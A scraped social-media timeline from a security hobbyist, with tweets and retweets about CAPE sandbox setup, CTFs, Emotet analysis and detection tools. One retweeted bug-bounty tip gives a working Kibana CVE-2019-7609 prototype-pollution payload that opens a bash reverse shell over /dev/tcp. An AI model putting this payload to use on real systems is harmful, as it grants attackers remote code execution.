vyu
Joined October 2010
- Tweets 405
- Following 1,115
- Followers 184
- Likes 2,529
29 Photos and videos
13 Mar 2021
@CapeSandbox Do you think it's possible to have the VMs on another server and the CAPE host on another? Been thinking of isolating them like this for testing, instead of building it on a single hardware. Looking through the configs, can't find the right place to modify.
2
13 Mar 2021
Just to note, I do see it's possible to do this via vmware server's config, esx, xen and such, but let's say I have VirtualBox on another machine, I don't think that's possible, correct? The only way without esx for example, is to have them on a local machine.
1
13 Mar 2021
However, let's say I want to build CAPE on a VM to begin with, and have another VM on the side, I don't think (also) that the guest CAPE VM will be able to turn on or off the VM guest that is on its side. Just to clarify.
5 Aug 2020
Ayy. Didn't think this would work, but after 2 days of pain (fun), though choppy results a bit it was a pass! Thanks to @_DC818_ and @layer_one for awesome people. Got my first @ANDnXOR badge. Can't wait to science the shit out of this tonight! And of course, #MattDamon
3
11
SickPea retweeted
21 Mar 2020
We're covering the last day of @wrccdc today! You can watch here, or join the chat on Twitch! We'll be taking suggestions and answering your blue/red/black team questions in Twitch chat! -> twitch.tv/hardchat
21 Mar 2020
ThugCrowd - live via Restream.io pscp.tv/w/cUTi4TFEWUVYR2JrWn…
4
8
14
SickPea retweeted
20 Mar 2020
We're covering and streaming @wrccdc today and tomorrow! You can watch here, or join the chat on Twitch! We'll be doing some interesting stuff throughout the competition. twitch.tv/hardchat
20 Mar 2020
ThugCrowd - live via Restream.io pscp.tv/w/cUOqqDFEWUVYR2JrWn…
1
6
8
SickPea retweeted
5 Dec 2019
🌟v2 of my free Intro to Android App Reverse Engineering workshop is here! 🌟
I've added 3 new exercises, walk-through videos for all 7 exercises, a new module on obfuscation, & exercises on vuln hunting rather than just malware. I hope it helps!
maddiestone.github.io/Androi…
46
832
2,313
I just published an in-depth analysis of how the #Emotet network protocol works. Also I've released a tool which emulated this protocol and is capable to download new #modules & #malware from the C&Cs.
It's integrated with @hatching_io and @CapeSandbox.
d00rt.github.io/emotet_netwo…
7
193
383
SickPea retweeted
23 Oct 2019
A new malware is converting the Discord client into an information-stealing backdoor.
This allows it to:
* Collect info about the user
* Check if payment info is stored
* Copy first 50 chars of the clipboard
* Execute extra commands from a remote site.
bleepingcomputer.com/news/se…
27
810
808
SickPea retweeted
23 Oct 2019
Get to the root of the problem and update Junos OS. Read about Juniper Networks latest advisory at go.usa.gov/xpc7w. #Cyber #Cybersecurity #InfoSec
19
12
This obviously means that I release WHIDS v1.6.2 which now integrates with @MISPProject. You can now create detection rules to detect in real time MISP IOCs.
#ThreatIntel #SOC #DFIR
github.com/0xrawsec/whids/re…
Updated WHIDS release v1.6.2 to fix a silly bug. If you downloaded it yesterday after my talk at @MISPProject Summit, please update ...
#ThreatIntel #SOC #DFIR
22
30
22 Oct 2019
RT @malwaremustd1e: Post exploitation, from scripts to the frameworks & infrastructure, is relying on code injection, escalation & trace co…
54
SickPea retweeted
21 Oct 2019
Had no clue about this, as of Python 3.5 you can bundle an entire application into a ZipFile (with a .pyz extension) and execute it directly. This is the equivalent of Java .jar files for Python
gist.github.com/lukassup/cf2…
Python zipapp
Python zipapp. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com 9
231
650
CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
#BugBountyTips #BugBounty #bugbountytip
POC: kibana < 6.6.0
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
slides.com/securitymb/protot…
5
263
577
MOBEXLER: a Mobile Application Penetration Testing Platform
GitHub: github.com/enciphers/Mobexle…
Blog post: enciphers.github.io/Mobexler…
1
45
119
13 Oct 2019
Loved my first year at @ShellConLa! Didn't go to any talks, but the workshops were pretty fun. I started the CTF on day 2, should have done it since day 1! Our team got many points in short amount of time, but the CTF ended 😂
The bonfire was fun as well. See you again next year.
2